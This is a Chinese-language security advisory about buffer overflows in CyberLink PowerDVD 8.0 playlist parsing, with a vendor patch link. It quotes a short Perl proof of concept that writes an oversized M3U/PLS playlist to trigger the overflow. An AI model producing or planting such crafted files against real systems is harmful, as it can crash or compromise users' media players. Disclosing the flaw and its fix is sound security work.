当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

PowerDVD \'.m3u\'及\'.pls\'文件多个缓冲区溢出漏洞

信息来源:Gjoko \'LiquidWorm\' Krstic      发表日期:2013-05-01 14:59:00

PowerDVD是台湾讯连科技所开发的高品质的影音光碟播放程序。

PowerDVD 8.0及之前版本在处理特制的PLS/M3U播放列表时存在多个缓冲区溢出漏洞,成功利用后可使远程攻击者在受影响应用上下文中执行任意代码。

 

BUGTRAQ-ID:30341

受影响系统:

PowerDVD PowerDVD 8.0

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl

#

# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit

# Coded by Gjoko "LiquidWorm" Krstic

# liquidworm [At] gmail.com

# http://www.zeroscience.org

#

 

$buffer = "J" x 520000;

 

open(m3u, ">./evil_list.m3u"); # or .pls

 

print m3u "$buffer";

 

print "\\n--> Evil Playlist created... Have fun!\\n";

 

# July, 2008

解决办法:

厂商补丁:

PowerDVD

--------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://cn.cyberlink.com/products/powerdvd-ultra/features_zh_CN.html?&r=1